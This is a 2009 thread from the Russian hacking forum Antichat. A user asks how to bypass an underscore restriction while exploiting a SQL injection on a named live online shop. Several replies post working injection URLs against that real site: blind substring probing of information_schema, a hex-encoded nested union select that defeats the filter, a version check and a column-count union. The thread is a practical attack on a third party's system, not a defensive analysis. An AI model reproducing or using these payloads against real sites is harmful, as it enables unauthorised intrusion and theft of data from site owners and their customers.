ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Альтернатива _ при SQL-inject'e
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Альтернатива _ при SQL-inject'e
  #1  
Старый 16.04.2009, 14:01
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию Альтернатива _ при SQL-inject'e
Собственно возник такой вопрос....
Имеем инъекцию вида:
http://site.com/super_page_123_321_174.html
При
http://site.com/super_page_123_321'_174.html
Получаем тупую инъекцию в WHERE id='321''
Однако при попытке встроить туда запрос вида:
http://site.com/super_page_123_321+union+select+1,`table_name`,3+f rom+information_schema.tables+limit+1--_174.html
Получаем ошибку в связи с тем, что читается строка до символа "_". Вопрос:
Можно ли чем-то заменить этот символ в столбце\названии таблицы?
Для примера ссылка:
http://www.cafegadgets.com/dvd-players-c-63%27_174.html
Заранее спасибо!
 

  #2  
Старый 16.04.2009, 14:13
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
впринципе нет
но так как тут скорее всего мод реврайт, ты можешь в гугле или в вебархиве поискать ссылки где ещё мод реврайт не поставили, мб тебе повезёт
или подбирай таблицы вручную
 

  #3  
Старый 16.04.2009, 15:27
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от Dima-k17  
Для примера ссылка:
http://www.cafegadgets.com/dvd-players-c-63%27_174.html
!


http://www.cafegadgets.com/pioneer-dvr550hs-recorder-p-1976+and+ascii(substring((select+concat_ws(0x2F,ta ble_name,table_schema,column_name)+from+informatio n_schema.columns+limit+0,1),1,1))>5.html

Где-то тут был скрипт для посимвольного перебора, возьми его, заюзай и ступай с миром
Последний раз редактировалось ElteRUS; 16.04.2009 в 15:30..
 

  #4  
Старый 16.04.2009, 17:01
Аватар для Dima-k17
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию
лол=) спасибо конечно за то что с миром послали, но тема вопроса в том, можно ли это обойти в конкретной ситуации? Я правильно понял, что нет? Только используя скулю в другом месте?
 

  #5  
Старый 16.04.2009, 17:19
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от Dima-k17  
Только используя скулю в другом месте?
да
 

  #6  
Старый 16.04.2009, 17:51
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Можно и здесь:
Код:
http://www.cafegadgets.com/dvd-players-c-63+and%201=2%20union+select+0x3120756e696f6e2073656c6563742076657273696f6e28292c636f6e636174283078326433312c7461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573206c696d697420312c31,0x27,0x27--_174.html
__________________
Карфаген должен быть разрушен...
 

  #7  
Старый 16.04.2009, 19:37
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://www.cafegadgets.com/dvd-players-c-63%20and%20substring(version(),1,1)=5--_174.html
Плюсы не испльзовать по этой ссылке, только пробелы или сразу %20

Пятая ветка

подбираем кол-во столбцов:

Код:
http://www.cafegadgets.com/dvd-players-c-63%20union%20select%201,2,3--_174.html
дальше сам
 

  #8  
Старый 16.04.2009, 19:57
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Pashkela ты вопрос читал?
У человека не проходит символ "_" , он нужен при выборке из information_schema, всё остальное там работает отлично с выводом, как положено
 

  #9  
Старый 16.04.2009, 20:00
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
А чем мой вариант плох?
__________________
Карфаген должен быть разрушен...
 

  #10  
Старый 16.04.2009, 20:44
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от Scipio  
А чем мой вариант плох?
Случай слишком уж частный, т.к. 'двойные' запросы встречаются намного реже чем 'не двойные'. Не будь его здесь - фильтрацию не удалось бы обойти, чего так отчаянно хочет тс (если сейчас еще кто-нибудь чего-нибудь не выдумает).

Впрочем я не спорю здесь это превосходно прокатило, а это главное. Нужно прокачивать наблюдательность и смекалку =)
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ